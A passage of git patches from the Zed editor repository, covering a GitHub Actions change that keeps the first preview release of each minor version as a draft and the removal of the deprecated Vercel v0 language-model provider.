my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Release Notes: - N/A --- .github/workflows/release.yml | 52 ++++++++++++-- tooling/xtask/src/tasks/workflows/release.rs | 75 +++++++++++++++++--- 2 files changed, 111 insertions(+), 16 deletions(-) diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 90c13e820ca522..05a28ec9c49685 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -718,7 +718,7 @@ jobs: needs: - validate_release_assets - release_compliance_check - if: startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') && !endsWith(github.ref, '.0-pre') + if: startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token @@ -727,10 +727,51 @@ jobs: with: app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} private-key: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} - - name: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false - run: gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false + - name: steps::checkout_repo + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd + with: + clean: false + ref: ${{ github.ref }} + token: ${{ steps.generate-token.outputs.token }} + - id: auto-release-preview + name: release::auto_release_preview::auto_release_preview + run: | + tag="$GITHUB_REF_NAME" + release_published=false + + if [[ ! "$tag" =~ ^v([0-9]+)\.([0-9]+)\.([0-9]+)-pre$ ]]; then + echo "::error::expected preview release tag in the form vMAJOR.MINOR.PATCH-pre, got $tag" + exit 1 + fi + + major="${BASH_REMATCH[1]}" + minor="${BASH_REMATCH[2]}" + should_release=true + + released_preview="$(script/get-released-version preview)" + if [[ -z "$released_preview" || "$released_preview" == "null" ]]; then + echo "::error::could not determine released preview version" + exit 1 + fi + + released_preview_major="$(echo "$released_preview" | cut -d. -f1)" + released_preview_minor="$(echo "$released_preview" | cut -d. -f2)" + + if [[ "$released_preview_major" != "$major" || "$released_preview_minor" != "$minor" ]]; then + should_release=false + echo "Leaving $tag as a draft because it is the first preview release for v${major}.${minor}.x" + fi + + if [[ "$should_release" == "true" ]]; then + gh release edit "$tag" --repo=zed-industries/zed --draft=false + release_published=true + fi + + echo "release_published=$release_published" >> "$GITHUB_OUTPUT" env: GITHUB_TOKEN: ${{ steps.generate-token.outputs.token }} + outputs: + release_published: ${{ steps.auto-release-preview.outputs.release_published }} push_release_update_notification: needs: - create_draft_release @@ -797,10 +838,10 @@ jobs: echo "" elif [ "$VALIDATE_RESULT" == "failure" ]; then echo "❌ Release validation failed for $TAG: missing assets: $RUN_URL" - elif [ "$AUTO_RELEASE_RESULT" == "success" ]; then - echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" elif [ "$AUTO_RELEASE_RESULT" == "failure" ]; then echo "❌ Auto release failed for $TAG: $RUN_URL" + elif [ "$AUTO_RELEASE_RESULT" == "success" ] && [ "$AUTO_RELEASE_PUBLISHED" == "true" ]; then + echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" else echo "👀 Release $TAG sitting freshly baked in the oven and waiting to be published: $RELEASE_URL" fi @@ -814,6 +855,7 @@ jobs: VALIDATE_RESULT: ${{ needs.validate_release_assets.result }} COMPLIANCE_RESULT: ${{ needs.release_compliance_check.result }} AUTO_RELEASE_RESULT: ${{ needs.auto_release_preview.result }} + AUTO_RELEASE_PUBLISHED: ${{ needs.auto_release_preview.outputs.release_published }} RUN_URL: ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }} TAG: ${{ github.ref_name }} RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} diff --git a/tooling/xtask/src/tasks/workflows/release.rs b/tooling/xtask/src/tasks/workflows/release.rs index c7db50bf6f698c..717bf8786b675a 100644 --- a/tooling/xtask/src/tasks/workflows/release.rs +++ b/tooling/xtask/src/tasks/workflows/release.rs @@ -64,7 +64,7 @@ pub(crate) fn release() -> Workflow { job_output, ); - let auto_release_preview = + let (auto_release_preview, auto_release_published) = auto_release_preview(&[&validate_release_assets, &release_compliance]); let test_jobs = [ @@ -82,6 +82,7 @@ pub(crate) fn release() -> Workflow { &validate_release_assets, &release_compliance, &auto_release_preview, + &auto_release_published, &test_jobs, &bundle, ); @@ -361,23 +362,70 @@ fn release_compliance_check(deps: &[&NamedJob], non_blocking_outcome: JobOutput) named::job(job) } -fn auto_release_preview(deps: &[&NamedJob]) -> NamedJob { +fn auto_release_preview(deps: &[&NamedJob]) -> (NamedJob, JobOutput) { + fn auto_release_preview(token: &StepOutput) -> Step { + named::bash(indoc::indoc! {r#" + tag="$GITHUB_REF_NAME" + release_published=false + + if [[ ! "$tag" =~ ^v([0-9]+)\.([0-9]+)\.([0-9]+)-pre$ ]]; then + echo "::error::expected preview release tag in the form vMAJOR.MINOR.PATCH-pre, got $tag" + exit 1 + fi + + major="${BASH_REMATCH[1]}" + minor="${BASH_REMATCH[2]}" + should_release=true + + released_preview="$(script/get-released-version preview)" + if [[ -z "$released_preview" || "$released_preview" == "null" ]]; then + echo "::error::could not determine released preview version" + exit 1 + fi + + released_preview_major="$(echo "$released_preview" | cut -d. -f1)" + released_preview_minor="$(echo "$released_preview" | cut -d. -f2)" + + if [[ "$released_preview_major" != "$major" || "$released_preview_minor" != "$minor" ]]; then + should_release=false + echo "Leaving $tag as a draft because it is the first preview release for v${major}.${minor}.x" + fi + + if [[ "$should_release" == "true" ]]; then + gh release edit "$tag" --repo=zed-industries/zed --draft=false + release_published=true + fi + + echo "release_published=$release_published" >> "$GITHUB_OUTPUT" + "#}) + .id("auto-release-preview") + .add_env(("GITHUB_TOKEN", token)) + } + let (authenticate, token) = steps::authenticate_as_zippy().into(); + let auto_release_preview_step = auto_release_preview(&token); + let release_published = StepOutput::new(&auto_release_preview_step, "release_published"); - named::job( + let job = named::job( dependant_job(deps) .runs_on(runners::LINUX_SMALL) .cond(Expression::new(indoc::indoc!( - r#"startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre') && !endsWith(github.ref, '.0-pre')"# + r#"startsWith(github.ref, 'refs/tags/v') && endsWith(github.ref, '-pre')"# ))) .add_step(authenticate) .add_step( - steps::script( - r#"gh release edit "$GITHUB_REF_NAME" --repo=zed-industries/zed --draft=false"#, - ) - .add_env(("GITHUB_TOKEN", &token)), + steps::checkout_repo() + .with_token(&token) + .with_ref(Context::github().ref_()), ) - ) + .add_step(auto_release_preview_step) + .outputs([( + release_published.name.to_owned(), + release_published.to_string(), + )]), + ); + let release_published = release_published.as_job_output(&job); + (job, release_published) } pub(crate) fn download_workflow_artifacts() -> Step { @@ -453,6 +501,7 @@ pub(crate) fn push_release_update_notification( validate_assets_job: &NamedJob, compliance_job: &NamedJob, auto_release_preview: &NamedJob, + auto_release_published: &JobOutput, test_jobs: &[&NamedJob], bundle_jobs: &ReleaseBundleJobs, ) -> NamedJob { @@ -487,6 +536,10 @@ pub(crate) fn push_release_update_notification( "AUTO_RELEASE_RESULT".into(), format!("${{{{ needs.{}.result }}}}", auto_release_preview.name), ), + ( + "AUTO_RELEASE_PUBLISHED".into(), + auto_release_published.to_string(), + ), ("RUN_URL".into(), CURRENT_ACTION_RUN_URL.to_string()), ("TAG".into(), Context::github().ref_name().to_string()), ] @@ -537,10 +590,10 @@ pub(crate) fn push_release_update_notification( echo "" elif [ "$VALIDATE_RESULT" == "failure" ]; then echo "❌ Release validation failed for $TAG: missing assets: $RUN_URL" - elif [ "$AUTO_RELEASE_RESULT" == "success" ]; then - echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" elif [ "$AUTO_RELEASE_RESULT" == "failure" ]; then echo "❌ Auto release failed for $TAG: $RUN_URL" + elif [ "$AUTO_RELEASE_RESULT" == "success" ] && [ "$AUTO_RELEASE_PUBLISHED" == "true" ]; then + echo "✅ Release $TAG was auto-released successfully: $RELEASE_URL" else echo "👀 Release $TAG sitting freshly baked in the oven and waiting to be published: $RELEASE_URL" fi From b831cf1ec08288001496db3910009997f215404c Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Wed, 29 Apr 2026 12:06:41 +0200 Subject: [PATCH 096/231] Remove v0 provider (#55177) Removes the Vercel v0 Provider, as the v0 API has been depredated/removed (https://api.v0.dev/v1) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - agent: Removed Vercel v0 provider as it has been deprecated by Vercel --- Cargo.lock | 11 - Cargo.toml | 2 - assets/icons/ai_v_zero.svg | 16 - assets/settings/default.json | 3 - crates/icons/src/icons.rs | 1 - crates/language_models/Cargo.toml | 1 - crates/language_models/src/language_models.rs | 9 - crates/language_models/src/provider.rs | 1 - crates/language_models/src/provider/vercel.rs | 470 ------------------ crates/language_models/src/settings.rs | 9 +- crates/settings_content/src/agent.rs | 1 - crates/settings_content/src/language_model.rs | 18 - crates/vercel/Cargo.toml | 23 - crates/vercel/LICENSE-GPL | 1 - crates/vercel/src/vercel.rs | 78 --- docs/src/ai/llm-providers.md | 13 - 16 files changed, 1 insertion(+), 656 deletions(-) delete mode 100644 assets/icons/ai_v_zero.svg delete mode 100644 crates/language_models/src/provider/vercel.rs delete mode 100644 crates/vercel/Cargo.toml delete mode 120000 crates/vercel/LICENSE-GPL delete mode 100644 crates/vercel/src/vercel.rs diff --git a/Cargo.lock b/Cargo.lock index 92dfd5304b5152..68392df3b7ada0 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -9659,7 +9659,6 @@ dependencies = [ "ui", "ui_input", "util", - "vercel", "x_ai", ] @@ -19450,16 +19449,6 @@ version = "0.2.15" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "accd4ea62f7bb7a82fe23066fb0957d48ef677f6eeb8215f372f52e48bb32426" -[[package]] -name = "vercel" -version = "0.1.0" -dependencies = [ - "anyhow", - "schemars 1.0.4", - "serde", - "strum 0.27.2", -] - [[package]] name = "version-compare" version = "0.2.0" diff --git a/Cargo.toml b/Cargo.toml index bf87ff22e5bc04..cd2b8cf54c26b1 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -213,7 +213,6 @@ members = [ "crates/ui_prompt", "crates/util", "crates/util_macros", - "crates/vercel", "crates/vim", "crates/vim_mode_setting", "crates/watch", @@ -470,7 +469,6 @@ ui_macros = { path = "crates/ui_macros" } ui_prompt = { path = "crates/ui_prompt" } util = { path = "crates/util" } util_macros = { path = "crates/util_macros" } -vercel = { path = "crates/vercel" } vim = { path = "crates/vim" } vim_mode_setting = { path = "crates/vim_mode_setting" } which_key = { path = "crates/which_key" } diff --git a/assets/icons/ai_v_zero.svg b/assets/icons/ai_v_zero.svg deleted file mode 100644 index 26d09ea26ac12e..00000000000000 --- a/assets/icons/ai_v_zero.svg +++ /dev/null @@ -1,16 +0,0 @@ - - - - - - - - - - - - - - - - diff --git a/assets/settings/default.json b/assets/settings/default.json index 02d93ece4a3f73..c0ec7b74f5abbf 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -2352,9 +2352,6 @@ "mistral": { "api_url": "https://api.mistral.ai/v1", }, - "vercel": { - "api_url": "https://api.v0.dev/v1", - }, "vercel_ai_gateway": { "api_url": "https://ai-gateway.vercel.sh/v1", }, diff --git a/crates/icons/src/icons.rs b/crates/icons/src/icons.rs index 568244912460ca..b49ad8e340b768 100644 --- a/crates/icons/src/icons.rs +++ b/crates/icons/src/icons.rs @@ -24,7 +24,6 @@ pub enum IconName { AiOpenCode, AiOpenRouter, AiVercel, - AiVZero, AiXAi, AiZed, Archive, diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index c74526dba23855..8e0216ba6c83c7 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -61,7 +61,6 @@ tokio = { workspace = true, features = ["rt", "rt-multi-thread"] } ui.workspace = true ui_input.workspace = true util.workspace = true -vercel = { workspace = true, features = ["schemars"] } x_ai = { workspace = true, features = ["schemars"] } [dev-dependencies] diff --git a/crates/language_models/src/language_models.rs b/crates/language_models/src/language_models.rs index d604ee432e487c..1920815871b7c7 100644 --- a/crates/language_models/src/language_models.rs +++ b/crates/language_models/src/language_models.rs @@ -28,7 +28,6 @@ use crate::provider::open_ai::OpenAiLanguageModelProvider; use crate::provider::open_ai_compatible::OpenAiCompatibleLanguageModelProvider; use crate::provider::open_router::OpenRouterLanguageModelProvider; use crate::provider::opencode::OpenCodeLanguageModelProvider; -use crate::provider::vercel::VercelLanguageModelProvider; use crate::provider::vercel_ai_gateway::VercelAiGatewayLanguageModelProvider; use crate::provider::x_ai::XAiLanguageModelProvider; pub use crate::settings::*; @@ -306,14 +305,6 @@ fn register_language_model_providers( )), cx, ); - registry.register_provider( - Arc::new(VercelLanguageModelProvider::new( - client.http_client(), - credentials_provider.clone(), - cx, - )), - cx, - ); registry.register_provider( Arc::new(VercelAiGatewayLanguageModelProvider::new( client.http_client(), diff --git a/crates/language_models/src/provider.rs b/crates/language_models/src/provider.rs index 35a1e90e4483ba..acf6579cae6b0b 100644 --- a/crates/language_models/src/provider.rs +++ b/crates/language_models/src/provider.rs @@ -12,6 +12,5 @@ pub mod open_ai_compatible; pub mod open_router; pub mod opencode; -pub mod vercel; pub mod vercel_ai_gateway; pub mod x_ai; diff --git a/crates/language_models/src/provider/vercel.rs b/crates/language_models/src/provider/vercel.rs deleted file mode 100644 index 188cb6d0322d36..00000000000000 --- a/crates/language_models/src/provider/vercel.rs +++ /dev/null @@ -1,470 +0,0 @@ -use anyhow::Result; -use collections::BTreeMap; -use credentials_provider::CredentialsProvider; -use futures::{FutureExt, StreamExt, future::BoxFuture}; -use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; -use http_client::HttpClient; -use language_model::{ - ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, LanguageModelToolChoice, RateLimiter, env_var, -}; -use open_ai::ResponseStreamEvent; -pub use settings::VercelAvailableModel as AvailableModel; -use settings::{Settings, SettingsStore}; -use std::sync::{Arc, LazyLock}; -use strum::IntoEnumIterator; -use ui::{ButtonLink, ConfiguredApiCard, List, ListBulletItem, prelude::*}; -use ui_input::InputField; -use util::ResultExt; -use vercel::VERCEL_API_URL; - -const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("vercel"); -const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("Vercel"); - -const API_KEY_ENV_VAR_NAME: &str = "VERCEL_API_KEY"; -static API_KEY_ENV_VAR: LazyLock = env_var!(API_KEY_ENV_VAR_NAME); - -#[derive(Clone, Debug, PartialEq)] -pub struct VercelSettings { - pub api_url: String, - pub available_models: Vec, -} - -pub struct VercelLanguageModelProvider { - http_client: Arc, - state: Entity, -} - -pub struct State { - api_key_state: ApiKeyState, - credentials_provider: Arc, -} - -impl State { - fn is_authenticated(&self) -> bool { - self.api_key_state.has_key() - } - - fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { - let credentials_provider = self.credentials_provider.clone(); - let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state.store( - api_url, - api_key, - |this| &mut this.api_key_state, - credentials_provider, - cx, - ) - } - - fn authenticate(&mut self, cx: &mut Context) -> Task> { - let credentials_provider = self.credentials_provider.clone(); - let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state.load_if_needed( - api_url, - |this| &mut this.api_key_state, - credentials_provider, - cx, - ) - } -} - -impl VercelLanguageModelProvider { - pub fn new( - http_client: Arc, - credentials_provider: Arc, - cx: &mut App, - ) -> Self { - let state = cx.new(|cx| { - cx.observe_global::(|this: &mut State, cx| { - let credentials_provider = this.credentials_provider.clone(); - let api_url = Self::api_url(cx); - this.api_key_state.handle_url_change( - api_url, - |this| &mut this.api_key_state, - credentials_provider, - cx, - ); - cx.notify(); - }) - .detach(); - State { - api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), - credentials_provider, - } - }); - - Self { http_client, state } - } - - fn create_language_model(&self, model: vercel::Model) -> Arc { - Arc::new(VercelLanguageModel { - id: LanguageModelId::from(model.id().to_string()), - model, - state: self.state.clone(), - http_client: self.http_client.clone(), - request_limiter: RateLimiter::new(4), - }) - } - - fn settings(cx: &App) -> &VercelSettings { - &crate::AllLanguageModelSettings::get_global(cx).vercel - } - - fn api_url(cx: &App) -> SharedString { - let api_url = &Self::settings(cx).api_url; - if api_url.is_empty() { - VERCEL_API_URL.into() - } else { - SharedString::new(api_url.as_str()) - } - } -} - -impl LanguageModelProviderState for VercelLanguageModelProvider { - type ObservableEntity = State; - - fn observable_entity(&self) -> Option> { - Some(self.state.clone()) - } -} - -impl LanguageModelProvider for VercelLanguageModelProvider { - fn id(&self) -> LanguageModelProviderId { - PROVIDER_ID - } - - fn name(&self) -> LanguageModelProviderName { - PROVIDER_NAME - } - - fn icon(&self) -> IconOrSvg { - IconOrSvg::Icon(IconName::AiVZero) - } - - fn default_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(vercel::Model::default())) - } - - fn default_fast_model(&self, _cx: &App) -> Option> { - Some(self.create_language_model(vercel::Model::default_fast())) - } - - fn provided_models(&self, cx: &App) -> Vec> { - let mut models = BTreeMap::default(); - - for model in vercel::Model::iter() { - if !matches!(model, vercel::Model::Custom { .. }) { - models.insert(model.id().to_string(), model); - } - } - - for model in &Self::settings(cx).available_models { - models.insert( - model.name.clone(), - vercel::Model::Custom { - name: model.name.clone(), - display_name: model.display_name.clone(), - max_tokens: model.max_tokens, - max_output_tokens: model.max_output_tokens, - max_completion_tokens: model.max_completion_tokens, - }, - ); - } - - models - .into_values() - .map(|model| self.create_language_model(model)) - .collect() - } - - fn is_authenticated(&self, cx: &App) -> bool { - self.state.read(cx).is_authenticated() - } - - fn authenticate(&self, cx: &mut App) -> Task> { - self.state.update(cx, |state, cx| state.authenticate(cx)) - } - - fn configuration_view( - &self, - _target_agent: language_model::ConfigurationViewTargetAgent, - window: &mut Window, - cx: &mut App, - ) -> AnyView { - cx.new(|cx| ConfigurationView::new(self.state.clone(), window, cx)) - .into() - } - - fn reset_credentials(&self, cx: &mut App) -> Task> { - self.state - .update(cx, |state, cx| state.set_api_key(None, cx)) - } -} - -pub struct VercelLanguageModel { - id: LanguageModelId, - model: vercel::Model, - state: Entity, - http_client: Arc, - request_limiter: RateLimiter, -} - -impl VercelLanguageModel { - fn stream_completion( - &self, - request: open_ai::Request, - cx: &AsyncApp, - ) -> BoxFuture<'static, Result>>> - { - let http_client = self.http_client.clone(); - - let (api_key, api_url) = self.state.read_with(cx, |state, cx| { - let api_url = VercelLanguageModelProvider::api_url(cx); - (state.api_key_state.key(&api_url), api_url) - }); - - let future = self.request_limiter.stream(async move { - let provider = PROVIDER_NAME; - let Some(api_key) = api_key else { - return Err(LanguageModelCompletionError::NoApiKey { provider }); - }; - let request = open_ai::stream_completion( - http_client.as_ref(), - provider.0.as_str(), - &api_url, - &api_key, - request, - ); - let response = request.await?; - Ok(response) - }); - - async move { Ok(future.await?.boxed()) }.boxed() - } -} - -impl LanguageModel for VercelLanguageModel { - fn id(&self) -> LanguageModelId { - self.id.clone() - } - - fn name(&self) -> LanguageModelName { - LanguageModelName::from(self.model.display_name().to_string()) - } - - fn provider_id(&self) -> LanguageModelProviderId { - PROVIDER_ID - } - - fn provider_name(&self) -> LanguageModelProviderName { - PROVIDER_NAME - } - - fn supports_tools(&self) -> bool { - true - } - - fn supports_images(&self) -> bool { - true - } - - fn supports_streaming_tools(&self) -> bool { - true - } - - fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { - match choice { - LanguageModelToolChoice::Auto - | LanguageModelToolChoice::Any - | LanguageModelToolChoice::None => true, - } - } - - fn telemetry_id(&self) -> String { - format!("vercel/{}", self.model.id()) - } - - fn max_token_count(&self) -> u64 { - self.model.max_token_count() - } - - fn max_output_tokens(&self) -> Option { - self.model.max_output_tokens() - } - - fn stream_completion( - &self, - request: LanguageModelRequest, - cx: &AsyncApp, - ) -> BoxFuture< - 'static, - Result< - futures::stream::BoxStream< - 'static, - Result, - >, - LanguageModelCompletionError, - >, - > { - let request = crate::provider::open_ai::into_open_ai( - request, - self.model.id(), - self.model.supports_parallel_tool_calls(), - self.model.supports_prompt_cache_key(), - self.max_output_tokens(), - None, - false, - ); - let completions = self.stream_completion(request, cx); - async move { - let mapper = crate::provider::open_ai::OpenAiEventMapper::new(); - Ok(mapper.map_stream(completions.await?).boxed()) - } - .boxed() - } -} - -struct ConfigurationView { - api_key_editor: Entity, - state: Entity, - load_credentials_task: Option>, -} - -impl ConfigurationView { - fn new(state: Entity, window: &mut Window, cx: &mut Context) -> Self { - let api_key_editor = cx.new(|cx| { - InputField::new( - window, - cx, - "v1:0000000000000000000000000000000000000000000000000", - ) - .label("API key") - }); - - cx.observe(&state, |_, _, cx| { - cx.notify(); - }) - .detach(); - - let load_credentials_task = Some(cx.spawn_in(window, { - let state = state.clone(); - async move |this, cx| { - if let Some(task) = Some(state.update(cx, |state, cx| state.authenticate(cx))) { - // We don't log an error, because "not signed in" is also an error. - let _ = task.await; - } - this.update(cx, |this, cx| { - this.load_credentials_task = None; - cx.notify(); - }) - .log_err(); - } - })); - - Self { - api_key_editor, - state, - load_credentials_task, - } - } - - fn save_api_key(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { - let api_key = self.api_key_editor.read(cx).text(cx).trim().to_string(); - if api_key.is_empty() { - return; - } - - // url changes can cause the editor to be displayed again - self.api_key_editor - .update(cx, |editor, cx| editor.set_text("", window, cx)); - - let state = self.state.clone(); - cx.spawn_in(window, async move |_, cx| { - state - .update(cx, |state, cx| state.set_api_key(Some(api_key), cx)) - .await - }) - .detach_and_log_err(cx); - } - - fn reset_api_key(&mut self, window: &mut Window, cx: &mut Context) { - self.api_key_editor - .update(cx, |input, cx| input.set_text("", window, cx)); - - let state = self.state.clone(); - cx.spawn_in(window, async move |_, cx| { - state - .update(cx, |state, cx| state.set_api_key(None, cx)) - .await - }) - .detach_and_log_err(cx); - } - - fn should_render_editor(&self, cx: &mut Context) -> bool { - !self.state.read(cx).is_authenticated() - } -} - -impl Render for ConfigurationView { - fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { - let env_var_set = self.state.read(cx).api_key_state.is_from_env_var(); - let configured_card_label = if env_var_set { - format!("API key set in {API_KEY_ENV_VAR_NAME} environment variable") - } else { - let api_url = VercelLanguageModelProvider::api_url(cx); - if api_url == VERCEL_API_URL { - "API key configured".to_string() - } else { - format!("API key configured for {}", api_url) - } - }; - - let api_key_section = if self.should_render_editor(cx) { - v_flex() - .on_action(cx.listener(Self::save_api_key)) - .child(Label::new("To use Zed's agent with Vercel v0, you need to add an API key. Follow these steps:")) - .child( - List::new() - .child( - ListBulletItem::new("") - .child(Label::new("Create one by visiting")) - .child(ButtonLink::new("Vercel v0's console", "https://v0.dev/chat/settings/keys")) - ) - .child( - ListBulletItem::new("Paste your API key below and hit enter to start using the agent") - ), - ) - .child(self.api_key_editor.clone()) - .child( - Label::new(format!( - "You can also set the {API_KEY_ENV_VAR_NAME} environment variable and restart Zed." - )) - .size(LabelSize::Small) - .color(Color::Muted), - ) - .child( - Label::new("Note that Vercel v0 is a custom OpenAI-compatible provider.") - .size(LabelSize::Small) - .color(Color::Muted), - ) - .into_any_element() - } else { - ConfiguredApiCard::new(configured_card_label) - .disabled(env_var_set) - .when(env_var_set, |this| { - this.tooltip_label(format!("To reset your API key, unset the {API_KEY_ENV_VAR_NAME} environment variable.")) - }) - .on_click(cx.listener(|this, _, window, cx| this.reset_api_key(window, cx))) - .into_any_element() - }; - - if self.load_credentials_task.is_some() { - div().child(Label::new("Loading credentials…")).into_any() - } else { - v_flex().size_full().child(api_key_section).into_any() - } - } -} diff --git a/crates/language_models/src/settings.rs b/crates/language_models/src/settings.rs index a8d1b384d34623..d7272a483becf4 100644 --- a/crates/language_models/src/settings.rs +++ b/crates/language_models/src/settings.rs @@ -8,8 +8,7 @@ use crate::provider::{ deepseek::DeepSeekSettings, google::GoogleSettings, lmstudio::LmStudioSettings, mistral::MistralSettings, ollama::OllamaSettings, open_ai::OpenAiSettings, open_ai_compatible::OpenAiCompatibleSettings, open_router::OpenRouterSettings, - opencode::OpenCodeSettings, vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, - x_ai::XAiSettings, + opencode::OpenCodeSettings, vercel_ai_gateway::VercelAiGatewaySettings, x_ai::XAiSettings, }; #[derive(Debug, RegisterSetting)] @@ -25,7 +24,6 @@ pub struct AllLanguageModelSettings { pub open_router: OpenRouterSettings, pub openai: OpenAiSettings, pub openai_compatible: HashMap, OpenAiCompatibleSettings>, - pub vercel: VercelSettings, pub vercel_ai_gateway: VercelAiGatewaySettings, pub x_ai: XAiSettings, pub zed_dot_dev: ZedDotDevSettings, @@ -47,7 +45,6 @@ impl settings::Settings for AllLanguageModelSettings { let open_router = language_models.open_router.unwrap(); let openai = language_models.openai.unwrap(); let openai_compatible = language_models.openai_compatible.unwrap(); - let vercel = language_models.vercel.unwrap(); let vercel_ai_gateway = language_models.vercel_ai_gateway.unwrap(); let x_ai = language_models.x_ai.unwrap(); let zed_dot_dev = language_models.zed_dot_dev.unwrap(); @@ -115,10 +112,6 @@ impl settings::Settings for AllLanguageModelSettings { ) }) .collect(), - vercel: VercelSettings { - api_url: vercel.api_url.unwrap(), - available_models: vercel.available_models.unwrap_or_default(), - }, vercel_ai_gateway: VercelAiGatewaySettings { api_url: vercel_ai_gateway.api_url.unwrap(), available_models: vercel_ai_gateway.available_models.unwrap_or_default(), diff --git a/crates/settings_content/src/agent.rs b/crates/settings_content/src/agent.rs index 12756c9bad5d9b..2cdeb1e94e1a0b 100644 --- a/crates/settings_content/src/agent.rs +++ b/crates/settings_content/src/agent.rs @@ -462,7 +462,6 @@ impl JsonSchema for LanguageModelProviderSetting { "ollama", "openai", "openrouter", - "vercel", "vercel_ai_gateway", "x_ai", "zed.dev" diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 619e9d72f84703..0fe922ae0b881e 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -21,7 +21,6 @@ pub struct AllLanguageModelSettingsContent { pub open_router: Option, pub openai: Option, pub openai_compatible: Option, OpenAiCompatibleSettingsContent>>, - pub vercel: Option, pub vercel_ai_gateway: Option, pub x_ai: Option, #[serde(rename = "zed.dev")] @@ -330,23 +329,6 @@ impl Default for OpenAiCompatibleModelCapabilities { } } -#[with_fallible_options] -#[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] -pub struct VercelSettingsContent { - pub api_url: Option, - pub available_models: Option>, -} - -#[with_fallible_options] -#[derive(Clone, Debug, PartialEq, Serialize, Deserialize, JsonSchema, MergeFrom)] -pub struct VercelAvailableModel { - pub name: String, - pub display_name: Option, - pub max_tokens: u64, - pub max_output_tokens: Option, - pub max_completion_tokens: Option, -} - #[with_fallible_options] #[derive(Default, Clone, Debug, Serialize, Deserialize, PartialEq, JsonSchema, MergeFrom)] pub struct VercelAiGatewaySettingsContent { diff --git a/crates/vercel/Cargo.toml b/crates/vercel/Cargo.toml deleted file mode 100644 index 6f6acc7f219f39..00000000000000 --- a/crates/vercel/Cargo.toml +++ /dev/null @@ -1,23 +0,0 @@ -[package] -name = "vercel" -version = "0.1.0" -edition.workspace = true -publish.workspace = true -license = "GPL-3.0-or-later" - -[lints] -workspace = true - -[lib] -path = "src/vercel.rs" -test = false - -[features] -default = [] -schemars = ["dep:schemars"] - -[dependencies] -anyhow.workspace = true -schemars = { workspace = true, optional = true } -serde.workspace = true -strum.workspace = true diff --git a/crates/vercel/LICENSE-GPL b/crates/vercel/LICENSE-GPL deleted file mode 120000 index 89e542f750cd38..00000000000000 --- a/crates/vercel/LICENSE-GPL +++ /dev/null @@ -1 +0,0 @@ -../../LICENSE-GPL \ No newline at end of file diff --git a/crates/vercel/src/vercel.rs b/crates/vercel/src/vercel.rs deleted file mode 100644 index 02ac291b9dd54a..00000000000000 --- a/crates/vercel/src/vercel.rs +++ /dev/null @@ -1,78 +0,0 @@ -use anyhow::Result; -use serde::{Deserialize, Serialize}; -use strum::EnumIter; - -pub const VERCEL_API_URL: &str = "https://api.v0.dev/v1"; - -#[cfg_attr(feature = "schemars", derive(schemars::JsonSchema))] -#[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq, EnumIter)] -pub enum Model { - #[default] - #[serde(rename = "v0-1.5-md")] - VZeroOnePointFiveMedium, - #[serde(rename = "custom")] - Custom { - name: String, - /// The name displayed in the UI, such as in the agent panel model dropdown menu. - display_name: Option, - max_tokens: u64, - max_output_tokens: Option, - max_completion_tokens: Option, - }, -} - -impl Model { - pub fn default_fast() -> Self { - Self::VZeroOnePointFiveMedium - } - - pub fn from_id(id: &str) -> Result { - match id { - "v0-1.5-md" => Ok(Self::VZeroOnePointFiveMedium), - invalid_id => anyhow::bail!("invalid model id '{invalid_id}'"), - } - } - - pub fn id(&self) -> &str { - match self { - 